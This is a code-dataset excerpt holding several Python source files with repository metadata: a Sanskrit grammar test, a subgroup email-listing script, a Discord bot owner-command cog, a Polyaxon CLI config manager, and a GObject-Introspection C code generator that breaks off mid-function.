| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138645ddd1d47197cec66a63b6f187e4f2176f57
| 423
|
py
|
Python
|
test/test_substitute.py
|
sanskrit/padmini
|
8e7e8946a7d2df9c941f689ea4bc7b6ebb7ca1d0
|
[
"MIT"
] | 1
|
2022-03-01T05:05:04.000Z
|
2022-03-01T05:05:04.000Z
|
test/test_substitute.py
|
sanskrit/padmini
|
8e7e8946a7d2df9c941f689ea4bc7b6ebb7ca1d0
|
[
"MIT"
] | null | null | null |
test/test_substitute.py
|
sanskrit/padmini
|
8e7e8946a7d2df9c941f689ea4bc7b6ebb7ca1d0
|
[
"MIT"
] | null | null | null |
from padmini import operations as op
def test_yatha():
before = ("tAs", "Tas", "Ta", "mip")
after = ("tAm", "tam", "ta", "am")
for i, b in enumerate(before):
assert op.yatha(b, before, after) == after[i]
"""
def test_ti():
assert S.ti("ta", "e") == "te"
assert S.ti("AtAm", "e") == "Ate"
def test_antya():
assert S.antya("ti", "u") == "tu"
assert S.antya("te", "Am") == "tAm"
"""
| 19.227273
| 53
| 0.51773
| 63
| 423
| 3.428571
| 0.492063
| 0.12963
| 0.083333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.236407
| 423
| 21
| 54
| 20.142857
| 0.668731
| 0
| 0
| 0
| 0
| 0
| 0.091304
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.166667
| false
| 0
| 0.166667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1388c9a700adcd34c480eb91c770af0acaf65dde
| 2,186
|
py
|
Python
|
TVSaffiliations/extractemails_nogui.py
|
kmhambleton/LSST-TVSSC.github.io
|
2391fcdeddf83321825532aa7d7682b5dcf567f0
|
[
"CC-BY-3.0"
] | null | null | null |
TVSaffiliations/extractemails_nogui.py
|
kmhambleton/LSST-TVSSC.github.io
|
2391fcdeddf83321825532aa7d7682b5dcf567f0
|
[
"CC-BY-3.0"
] | 3
|
2018-06-15T10:12:39.000Z
|
2022-03-23T23:43:27.000Z
|
TVSaffiliations/extractemails_nogui.py
|
kmhambleton/LSST-TVSSC.github.io
|
2391fcdeddf83321825532aa7d7682b5dcf567f0
|
[
"CC-BY-3.0"
] | 5
|
2018-03-27T12:53:55.000Z
|
2019-07-17T15:54:09.000Z
|
# coding: utf-8
#just prints the emails of members of a group to stdout,
#both primary and secondary members
# run as
# $python extractemails_nogui.py "Tidal Disruption Events"
from __future__ import print_function
'__author__' == 'Federica Bianco, NYU - GitHub: fedhere'
import sys
import pandas as pd
from argparse import ArgumentParser
from config import tvsfile
def parse_args(subglist):
""" Use ArgParser to build up the arguments we will use in our script
"""
stored_args = {}
# get the script name without the extension & use it to build up
# the json filename
parser = ArgumentParser(description='Selecting members by subgroup')
parser.add_argument('subgroup',
action='store',
default=None,
help='Choose the subgroup affiliation:' +
' -- '.join([s for s in subglist]))
args = parser.parse_args()
return args
if __name__ == '__main__':
if tvsfile is None:
print ("Required Argument: Google Doc file identifier (if you do not have it email federica!)")
sys.exit()
TVSMembers = pd.read_csv('https://docs.google.com/spreadsheets/d/' +
tvsfile +
'/export?gid=0&format=csv',
index_col=0)
subgroups = TVSMembers.primary.unique()
conf = parse_args([x for x in subgroups if str(x) != 'nan'])
primary = conf.subgroup
secondary = conf.subgroup
emails = TVSMembers[TVSMembers.primary == primary]['email'].values
print ("These are the members with primary affiliation with " + primary)
print ("")
print (' '.join([em + ','for em in emails]))
emails = TVSMembers[(TVSMembers.secondary == secondary) | (TVSMembers['secondary.1'] == secondary) | (TVSMembers['secondary.2'] == secondary)]['email'].values
print ("\n")
print ("These are the members with secondary affiliation with " + secondary)
print ("")
print (' '.join([em + ','for em in emails]))
print ("")
print ("If you also want their names and affiliations use: ")
print ("$python extractemailsW.py " + conf.subgroup)
| 35.836066
| 162
| 0.627173
| 261
| 2,186
| 5.157088
| 0.505747
| 0.020059
| 0.013373
| 0.017831
| 0.08321
| 0.08321
| 0.043091
| 0.043091
| 0
| 0
| 0
| 0.003096
| 0.261208
| 2,186
| 60
| 163
| 36.433333
| 0.830341
| 0.145929
| 0
| 0.125
| 0
| 0
| 0.272923
| 0.012945
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025
| false
| 0
| 0.125
| 0
| 0.175
| 0.3
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1388cb066414d3af45386f8ba3a988639cd4786c
| 20,373
|
py
|
Python
|
cogs/owner.py
|
Obsidian-Development/JDBot
|
315b0782126ac36fe934ac3ba2d7132710d58651
|
[
"MIT"
] | null | null | null |
cogs/owner.py
|
Obsidian-Development/JDBot
|
315b0782126ac36fe934ac3ba2d7132710d58651
|
[
"MIT"
] | 1
|
2021-11-09T14:30:49.000Z
|
2021-11-09T14:31:19.000Z
|
cogs/owner.py
|
Obsidian-Development/JDBot
|
315b0782126ac36fe934ac3ba2d7132710d58651
|
[
"MIT"
] | null | null | null |
from discord.ext import commands, menus
import utils
import random , discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy
import traceback, textwrap
from discord.ext.menus.views import ViewMenuPages
class Owner(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(brief="a command to send mail")
async def mail(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.reply("User not found, returning Letter")
user = ctx.author
if user:
await ctx.reply("Please give me a message to use.")
message = await self.bot.wait_for("message",check = utils.check(ctx))
embed_message = discord.Embed(title=message.content, timestamp=(message.created_at), color=random.randint(0, 16777215))
embed_message.set_author(name=f"Mail from: {ctx.author}",icon_url=(ctx.author.display_avatar.url))
embed_message.set_footer(text = f"{ctx.author.id}")
embed_message.set_thumbnail(url = "https://i.imgur.com/1XvDnqC.png")
if (user.dm_channel is None):
await user.create_dm()
try:
await user.send(embed=embed_message)
except:
user = ctx.author
await user.send(content="Message failed. sending",embed=embed_message)
embed_message.add_field(name="Sent To:",value=str(user))
await self.bot.get_channel(855217084710912050).send(embed=embed_message)
@commands.command()
async def load(self, ctx, *, cog = None):
if cog:
try:
self.bot.load_extension(cog)
except Exception as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("Loaded cog(see if there's any errors)")
if cog is None:
await ctx.send("you can't ask to load no cogs.")
@commands.command()
async def reload(self, ctx, *, cog = None):
cog = cog or "all"
if cog == "all":
for x in list(self.bot.extensions):
try:
self.bot.reload_extension(x)
except commands.errors.ExtensionError as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("done reloading all cogs(check for any errors)")
else:
try:
self.bot.reload_extension(cog)
except commands.errors.ExtensionError as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("Cog reloaded :D (check for any errors)")
@commands.command()
async def unload(self, ctx, *, cog = None):
if cog:
try:
self.bot.unload_extension(cog)
except commands.errors.ExtensionError as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("Cog should be unloaded just fine :D.(check any errors)")
if cog is None:
await ctx.send("you can't ask to reload no cogs")
@commands.command()
async def shutdown(self, ctx):
await ctx.send("shutdown/logout time happening.")
await self.bot.close()
async def cog_check(self, ctx):
return await self.bot.is_owner(ctx.author)
async def cog_command_error(self, ctx, error):
if ctx.command or not ctx.command.has_error_handler():
await ctx.send(error)
traceback.print_exc()
#I need to fix all cog_command_error
@commands.command(brief="Changes Bot Status(Owner Only)")
async def status(self , ctx , * , args=None):
if await self.bot.is_owner(ctx.author):
if args:
await self.bot.change_presence(status=discord.Status.do_not_disturb, activity= discord.Activity(type=discord.ActivityType.watching,name=args))
if args is None:
await self.bot.change_presence(status=discord.Status.do_not_disturb)
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("That's an owner only command")
@commands.command(brief="Only owner command to change bot's nickname")
async def change_nick(self, ctx ,*, name=None):
if await self.bot.is_owner(ctx.author):
if isinstance(ctx.channel, discord.TextChannel):
await ctx.send("Changing Nickname")
try:
await ctx.guild.me.edit(nick=name)
except discord.Forbidden:
await ctx.send("Appears not to have valid perms")
if isinstance(ctx.channel,discord.DMChannel):
await ctx.send("You can't use that in Dms.")
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that command")
class ServersEmbed(menus.ListPageSource):
async def format_page(self, menu, item):
embed = discord.Embed(title="Servers:",description=item,color=random.randint(0, 16777215))
return embed
@commands.command(brief="a command to give a list of servers(owner only)",help="Gives a list of guilds(Bot Owners only)")
async def servers(self, ctx):
if await self.bot.is_owner(ctx.author):
pag = commands.Paginator()
for g in self.bot.guilds:
pag.add_line(f"[{len(g.members)}/{g.member_count}] **{g.name}** (`{g.id}`) | {(g.system_channel or g.text_channels[0]).mention}")
pages = [page.strip("`") for page in pag.pages]
menu = ViewMenuPages(self.ServersEmbed(pages, per_page=1),delete_message_after=True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that it's owner only")
@commands.command(brief="only works with JDJG, but this command is meant to send updates to my webhook")
async def webhook_update(self, ctx, *, args = None):
if await self.bot.is_owner(ctx.author):
if args:
if isinstance(ctx.channel, discord.TextChannel):
try:
await ctx.message.delete()
except:
await ctx.send("It couldn't delete the message in this guils so, I kept it here.")
webhook = discord.Webhook.from_url(os.environ["webhook1"], session = self.bot.session)
embed=discord.Embed(title="Update",color=(35056),timestamp=(ctx.message.created_at))
embed.add_field(name="Update Info:",value=args)
embed.set_author(name="JDJG's Update",icon_url='https://i.imgur.com/pdQkCBv.png')
embed.set_footer(text="JDJG's Updates")
await webhook.send(embed=embed)
webhook=discord.Webhook.from_url(os.environ["webhook99"], session = self.bot.session)
embed=discord.Embed(title="Update",color=(35056),timestamp=(ctx.message.created_at))
embed.add_field(name="Update Info:",value=args)
embed.set_author(name="JDJG's Update",icon_url='https://i.imgur.com/pdQkCBv.png')
embed.set_footer(text="JDJG's Updates")
await webhook.send(embed=embed)
if args is None:
await ctx.send("You sadly can't use it like that.")
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that")
@commands.command(brief="Commands to see what guilds a person is in.")
async def mutualguilds(self, ctx, *, user: utils.BetterUserconverter = None):
user = user or ctx.author
pag = commands.Paginator()
for g in user.mutual_guilds:
pag.add_line(f"{g}")
pages = [page.strip("`") for page in pag.pages]
pages = pages or ["No shared servers"]
menu = ViewMenuPages(utils.mutualGuildsEmbed(pages, per_page=1),delete_message_after = True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
@commands.command(brief="A command to add sus_users with a reason")
async def addsus(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("can't have a user be none.")
if user:
await ctx.reply("Please give me a reason why:")
reason = await self.bot.wait_for("message",check= utils.check(ctx))
cur = await self.bot.sus_users.cursor()
await cur.execute("INSERT INTO sus_users VALUES (?, ?)", (user.id, reason.content))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send("added sus users, succesfully")
@commands.command(brief="a command to remove sus users.")
async def removesus(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("You can't have a none user.")
if user:
cur = await self.bot.sus_users.cursor()
await cur.execute("DELETE FROM sus_users WHERE user_id = ?", (user.id,))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send("Removed sus users.")
class SusUsersEmbed(menus.ListPageSource):
async def format_page(self, menu, item):
embed=discord.Embed(title = "Users Deemed Suspicious by JDJG Inc. Official", color = random.randint(0, 16777215))
embed.add_field(name = f"User ID : {item[0]}", value = f"**Reason :** {item[1]}", inline = False)
return embed
@commands.command(brief="a command to grab all in the sus_users list")
async def sus_users(self, ctx):
cur = await self.bot.sus_users.cursor()
cursor = await cur.execute("SELECT * FROM SUS_USERS;")
sus_users = tuple(await cursor.fetchall())
await cur.close()
await self.bot.sus_users.commit()
menu = ViewMenuPages(self.SusUsersEmbed(sus_users, per_page=1),delete_message_after=True)
await menu.start(ctx)
@sus_users.error
async def sus_users_error(self, ctx, error):
await ctx.send(error)
class TestersEmbed(menus.ListPageSource):
async def format_page(self, menu, item):
embed = discord.Embed(title = "Testing Users:", color = random.randint(0, 16777215))
embed.add_field(name = "User ID:", value = f"{item}", inline = False)
return embed
@commands.command(brief = "a command listed all the commands")
async def testers(self, ctx):
menu = ViewMenuPages(self.TestersEmbed(self.bot.testers, per_page = 1), delete_message_after = True)
await menu.start(ctx)
@commands.command()
async def update_sus(self, ctx):
await self.bot.sus_users.commit()
await ctx.send("Updated SQL boss.")
@update_sus.error
async def update_sus_error(self, ctx, error):
await ctx.send(error)
@commands.command(aliases=["bypass_command"])
async def command_bypass(self, ctx ,user: utils.BetterUserconverter = None, *, command = None):
#make sure to swap to autoconverter if it gets added.
user = user or ctx.author
if command:
command_wanted=self.bot.get_command(command)
if command_wanted:
await ctx.send(f"{command_wanted.name} now accessible for the {user} for one command usage!")
self.bot.special_access[user.id]=command_wanted.name
if command_wanted is None:
await ctx.send("Please specify a valid command.")
if command is None:
await ctx.send("select a command :(")
@commands.command(brief = "resets cooldown for you.",aliases = ["reset_cooldown"])
async def resetcooldown(self, ctx, *, command = None):
if not command:
return await ctx.send("please specificy a command")
command_wanted = self.bot.get_command(command)
if not command_wanted:
return await ctx.send("please specify a command")
if not command_wanted.is_on_cooldown(ctx):
return await ctx.send("That doesn't have a cooldown/isn't on a cooldown.")
command_wanted.reset_cooldown(ctx)
await ctx.send(f"reset cooldown of {command_wanted}")
@commands.command(brief = "leaves a guild only use when needed or really wanted. Otherwise no thanks.")
async def leave_guild(self, ctx, *, guild: typing.Optional[discord.Guild] = None):
guild = guild or ctx.guild
if guild is None: return await ctx.send("Guild is None can't do anything.")
await ctx.send("Bot leaving guild :(")
try:
await guild.leave()
except Exception as e:
await ctx.send(f"Somehow an error occured: {e}")
traceback.print_exc()
@commands.command()
async def aioinput_test(self, ctx, *, args = None):
args = args or "Test"
result=await self.bot.loop.run_in_executor(None, input, (f"{args}:"))
await ctx.send(f"Result of the input was {result}")
@commands.command(brief="a powerful owner tool to reload local files that aren't reloadable.")
async def reload_basic(self, ctx, *, args = None):
if args is None:await ctx.send("Can't reload module named None")
if args:
try: module = importlib.import_module(name=args)
except Exception as e:
traceback.print_exc()
return await ctx.send(e)
try: value=importlib.reload(module)
except Exception as e:
traceback.print_exc()
return await ctx.send(e)
await ctx.send(f"Sucessfully reloaded {value.__name__} \nMain Package: {value.__package__}")
@commands.command(brief="backs up a channel and then sends it into a file or mystbin")
async def channel_backup(self, ctx):
messages = await ctx.channel.history(limit = None, oldest_first = True).flatten()
new_line = "\n"
page = "\n".join(f"{msg.author} ({('Bot' if msg.author.bot else 'User')}) : {msg.content} {new_line}Attachments : {msg.attachments}" if msg.content else f"{msg.author} ({('Bot' if msg.author.bot else 'User')}) : {new_line.join(f'{e.to_dict()}' for e in msg.embeds)} {new_line}Attachments : {msg.attachments}" for msg in messages)
mystbin_client = mystbin.Client(session = self.bot.session)
paste = await mystbin_client.post(page)
await ctx.author.send(content=f"Added text file to mystbin: \n{paste.url}")
@channel_backup.error
async def channel_backup_error(self, ctx, error):
etype = type(error)
trace = error.__traceback__
values=''.join(map(str,traceback.format_exception(etype, error, trace)))
pages = textwrap.wrap(values, width = 1992)
menu = ViewMenuPages(utils.ErrorEmbed(pages, per_page = 1),delete_message_after = True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
mystbin_client = mystbin.Client(session=self.bot.session)
paste = await mystbin_client.post(values)
await ctx.send(f"Traceback: {paste.url}")
@commands.command(brief = "adds packages and urls to rtfm DB", aliases=["add_rtfm"])
async def addrtfm(self, ctx, name = None, *, url = None):
if not name or not url or not name and not url:
return await ctx.send("You need a name and also url.")
cur = await self.bot.sus_users.cursor()
await cur.execute("INSERT INTO RTFM_DICTIONARY VALUES (?, ?)", (name, url))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send(f"added {name} and {url} to the rtfm DB")
@commands.command(brief = "removes packages from the rtfm DB", aliases = ["remove_rtfm"])
async def removertfm(self, ctx, *, name = None):
if name is None:
return await ctx.send("You can't remove None")
cur = await self.bot.sus_users.cursor()
await cur.execute("DELETE FROM RTFM_DICTIONARY WHERE name = ?", (name,))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send(f"Removed the rfm value {name}.")
@commands.command(brief = "a command to save images to imgur(for owner only lol)")
async def save_image(self, ctx):
if not ctx.message.attachments:
return await ctx.send("You need to provide some attachments.")
await ctx.send("JDJG doesn't take any responbility for what you upload here :eyes: don't upload anything bad okay?")
for x in ctx.message.attachments:
try:
discord.utils._get_mime_type_for_image(await x.read())
except Exception as e:
traceback.print_exc()
return await ctx.send(e)
imgur_client= aioimgur.ImgurClient(os.environ["imgur_id"], os.environ["imgur_secret"])
imgur_url = await imgur_client.upload(await x.read())
await ctx.send(f"{imgur_url['link']}")
@commands.command(brief="A command to remove testers")
async def remove_tester(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("You can't have a non existent user.")
if user:
cur = await self.bot.sus_users.cursor()
await cur.execute("DELETE FROM testers_list WHERE user_id = ?", (user.id,))
await self.bot.sus_users.commit()
await cur.close()
if not user.id in self.bot.testers:
return await ctx.send(f"{user} isn't in the testers list.")
else:
self.bot.testers.remove(user.id)
await ctx.send(f"Removed tester known as {user}")
@commands.command(brief="A command to add testers")
async def add_tester(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("You can't have a non existent user.")
if user:
cur = await self.bot.sus_users.cursor()
await cur.execute("INSERT INTO testers_list VALUES (?)", (user.id,))
await self.bot.sus_users.commit()
await cur.close()
if not user.id in self.bot.testers:
self.bot.testers.append(user.id)
await ctx.send(f"added tester known as {user}")
else:
return await ctx.send(f"{user} is in the testers list already!")
def tweepy_post(self, post_text = None):
consumer_key = os.getenv('tweet_key')
consumer_secret = os.getenv('tweet_secret')
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
access_token = os.getenv('tweet_access')
access_secret = os.getenv('tweet_token')
auth.set_access_token(access_token, access_secret)
twitter_api = tweepy.API(auth)
return twitter_api.update_status(status = post_text)
@commands.command(brief = "sends tweet to JDBot Twitter")
async def send_tweet(self, ctx, *, args = None):
if not args:
return await ctx.send("you can't send nothing to twitter.")
try:
tweet_time = functools.partial(self.tweepy_post, args)
post = await self.bot.loop.run_in_executor(None, tweet_time)
except Exception as e:
traceback.print_exc()
return await ctx.send(f"Exception occured at {e}")
await ctx.send(f"Url of sent tweet is: https://twitter.com/twitter/statuses/{post.id}")
@commands.command(brief = "chunks a guild for the purpose of testing purpose(it's owner only to be used in testing guilds only)")
async def chunk_guild(self, ctx):
if ctx.guild is None:
return await ctx.send("You can't chunk a guild that doesn't exist or a channel that is a DM.")
if ctx.guild.chunked:
return await ctx.send("No need to chunk this guild, it appears to be chunked")
await ctx.guild.chunk(cache = True)
await ctx.send("Finished chunking..")
@chunk_guild.error
async def chunk_guild_error(self, ctx, error):
await ctx.send(error)
traceback.print_exc()
@commands.command(brief = "displays the guild status and user status immediately")
async def stats_status(self, ctx):
await ctx.send("changing status, check now....")
await self.bot.change_presence(status=discord.Status.online, activity=discord.Activity(type=discord.ActivityType.watching, name=f"{len(self.bot.guilds)} servers | {len(self.bot.users)} users"))
@stats_status.error
async def stats_status_error(self, ctx, error):
await ctx.send(error)
@commands.command(brief="a command to give a list of servers(owner only)",help="Gives a list of guilds(Bot Owners only) but with join dates updated.")
async def servers2(self, ctx):
if await self.bot.is_owner(ctx.author):
sorted_guilds = sorted(self.bot.guilds, key=lambda guild: guild.me.joined_at)
pag = commands.Paginator()
for g in sorted_guilds:
pag.add_line(f"{discord.utils.format_dt(g.me.joined_at, style = 'd')} {discord.utils.format_dt(g.me.joined_at, style = 'T')} \n[{len(g.members)}/{g.member_count}] **{g.name}** (`{g.id}`) | {(g.system_channel or g.text_channels[0]).mention}\n")
pages = [page.strip("`") for page in pag.pages]
menu = ViewMenuPages(self.ServersEmbed(pages, per_page=1),delete_message_after=True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that it's owner only")
def setup(bot):
bot.add_cog(Owner(bot))
| 38.223265
| 333
| 0.676827
| 3,001
| 20,373
| 4.505165
| 0.142286
| 0.047337
| 0.060355
| 0.017751
| 0.525666
| 0.482544
| 0.442086
| 0.406435
| 0.372559
| 0.332914
| 0
| 0.005092
| 0.199971
| 20,373
| 532
| 334
| 38.295113
| 0.824406
| 0.00427
| 0
| 0.397985
| 0
| 0.017632
| 0.231907
| 0.017107
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007557
| false
| 0.005038
| 0.017632
| 0
| 0.085642
| 0.027708
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1389758aa9eb7eb25584e0a02ef64f27158cea18
| 2,395
|
py
|
Python
|
cli/polyaxon/managers/cli.py
|
hackerwins/polyaxon
|
ff56a098283ca872abfbaae6ba8abba479ffa394
|
[
"Apache-2.0"
] | null | null | null |
cli/polyaxon/managers/cli.py
|
hackerwins/polyaxon
|
ff56a098283ca872abfbaae6ba8abba479ffa394
|
[
"Apache-2.0"
] | null | null | null |
cli/polyaxon/managers/cli.py
|
hackerwins/polyaxon
|
ff56a098283ca872abfbaae6ba8abba479ffa394
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2019 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
from __future__ import absolute_import, division, print_function
from distutils.version import LooseVersion # pylint:disable=import-error
from polyaxon.managers.base import BaseConfigManager
from polyaxon.schemas.cli.cli_configuration import CliConfigurationConfig
class CliConfigManager(BaseConfigManager):
"""Manages access cli configuration .polyaxoncli file."""
IS_GLOBAL = True
CONFIG_FILE_NAME = ".polyaxoncli"
CONFIG = CliConfigurationConfig
FREQUENCY = 3
@classmethod
def _get_count(cls):
config = cls.get_config_or_default()
return config.check_count + 1
@classmethod
def reset(
cls,
check_count=None,
current_version=None,
server_versions=None,
log_handler=None,
):
if not any([check_count, current_version, server_versions, log_handler]):
return
cli_config = cls.get_config_or_default()
if check_count is not None:
cli_config.check_count = check_count
if current_version is not None:
cli_config.current_version = current_version
if server_versions is not None:
cli_config.server_versions = server_versions
if log_handler is not None:
cli_config.log_handler = log_handler
CliConfigManager.set_config(config=cli_config)
return cli_config
@classmethod
def should_check(cls):
count = cls._get_count()
cls.reset(check_count=count)
if count > cls.FREQUENCY:
return True
config = cls.get_config_or_default()
if config.current_version is None or config.min_version is None:
return True
return LooseVersion(config.current_version) < LooseVersion(config.min_version)
| 32.808219
| 86
| 0.703967
| 304
| 2,395
| 5.355263
| 0.391447
| 0.042998
| 0.022113
| 0.029484
| 0.096437
| 0.052211
| 0.035627
| 0
| 0
| 0
| 0
| 0.005965
| 0.230063
| 2,395
| 72
| 87
| 33.263889
| 0.876898
| 0.276827
| 0
| 0.159091
| 0
| 0
| 0.007018
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068182
| false
| 0
| 0.090909
| 0
| 0.409091
| 0.022727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138acf726b02bf36085bf40542bda0ebebd538c5
| 6,190
|
py
|
Python
|
openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/lib/gobject-introspection/giscanner/codegen.py
|
sotaoverride/backup
|
ca53a10b72295387ef4948a9289cb78ab70bc449
|
[
"Apache-2.0"
] | null | null | null |
openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/lib/gobject-introspection/giscanner/codegen.py
|
sotaoverride/backup
|
ca53a10b72295387ef4948a9289cb78ab70bc449
|
[
"Apache-2.0"
] | null | null | null |
openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/lib/gobject-introspection/giscanner/codegen.py
|
sotaoverride/backup
|
ca53a10b72295387ef4948a9289cb78ab70bc449
|
[
"Apache-2.0"
] | null | null | null |
# -*- Mode: Python -*-
# GObject-Introspection - a framework for introspecting GObject libraries
# Copyright (C) 2010 Red Hat, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
#
import os
from contextlib import contextmanager
from . import ast
class CCodeGenerator(object):
def __init__(self, namespace,
out_h_filename,
out_c_filename,
function_decoration=[],
include_first_header=[],
include_last_header=[],
include_first_src=[],
include_last_src=[]):
self.out_h_filename = out_h_filename
self.out_c_filename = out_c_filename
self.function_decoration = function_decoration
self.include_first_header = include_first_header
self.include_last_header = include_last_header
self.include_first_src = include_first_src
self.include_last_src = include_last_src
self._function_bodies = {}
self.namespace = namespace
def gen_symbol(self, name):
name = name.replace(' ', '_')
return '%s_%s' % (self.namespace.symbol_prefixes[0], name)
def _typecontainer_to_ctype(self, param):
if (isinstance(param, ast.Parameter)
and param.direction in (ast.PARAM_DIRECTION_OUT, ast.PARAM_DIRECTION_INOUT)):
suffix = '*'
else:
suffix = ''
if (param.type.is_equiv((ast.TYPE_STRING, ast.TYPE_FILENAME))
and param.transfer == ast.PARAM_TRANSFER_NONE):
return "const gchar*" + suffix
return param.type.ctype + suffix
def _write_prelude(self, out, func):
if self.function_decoration:
out.write("""
%s""" % " ".join(self.function_decoration))
out.write("""
%s
%s (""" % (self._typecontainer_to_ctype(func.retval), func.symbol))
l = len(func.parameters)
if func.parameters:
for i, param in enumerate(func.parameters):
ctype = self._typecontainer_to_ctype(param)
out.write('%s %s' % (ctype, param.argname))
if i < l - 1:
out.write(", ")
else:
out.write('void')
out.write(")")
def _write_prototype(self, func):
self._write_prelude(self.out_h, func)
self.out_h.write(";\n\n")
def _write_annotation_transfer(self, node):
if (node.type not in ast.BASIC_TYPES or
node.type.ctype.endswith('*')):
self.out_c.write(" (transfer %s)" % (node.transfer, ))
def _write_docs(self, func):
self.out_c.write("/**\n * %s:\n" % (func.symbol, ))
for param in func.parameters:
self.out_c.write(" * @%s" % (param.argname, ))
if param.direction in (ast.PARAM_DIRECTION_OUT,
ast.PARAM_DIRECTION_INOUT):
if param.caller_allocates:
allocate_string = ' caller-allocates'
else:
allocate_string = ''
self.out_c.write(": (%s%s) " % (param.direction,
allocate_string))
self._write_annotation_transfer(param)
self.out_c.write(":\n")
self.out_c.write(' *\n')
self.out_c.write(' * Undocumented.')
if func.retval.type != ast.TYPE_NONE:
self.out_c.write('\n *\n')
self.out_c.write(' * Returns: ')
self._write_annotation_transfer(func.retval)
self.out_c.write('\n */')
@contextmanager
def _function(self, func):
self._write_prototype(func)
self._write_docs(func)
self._write_prelude(self.out_c, func)
self.out_c.write("\n{\n")
yield
self.out_c.write("}\n\n")
def _codegen_start(self):
warning = '/* GENERATED BY testcodegen.py; DO NOT EDIT */\n\n'
self.out_h.write(warning)
nsupper = self.namespace.name.upper()
for header in self.include_first_header:
self.out_h.write("""#include "%s"\n""" % header)
self.out_h.write("""
#ifndef __%s_H__
#define __%s_H__
#include <glib-object.h>
""" % (nsupper, nsupper))
for header in self.include_last_header:
self.out_h.write("""#include "%s"\n""" % header)
self.out_c.write(warning)
for header in self.include_first_src:
self.out_c.write("""#include "%s"\n""" % header)
src_dir = os.path.dirname(os.path.realpath(self.out_c.name))
header = os.path.relpath(self.out_h_filename, src_dir)
self.out_c.write("""#include "%s"\n\n""" % (header, ))
for header in self.include_last_src:
self.out_c.write("""#include "%s"\n""" % header)
def _codegen_end(self):
self.out_h.write("""#endif\n""")
self.out_h.close()
self.out_c.close()
def set_function_body(self, node, body):
assert isinstance(node, ast.Function)
self._function_bodies[node] = body
def codegen(self):
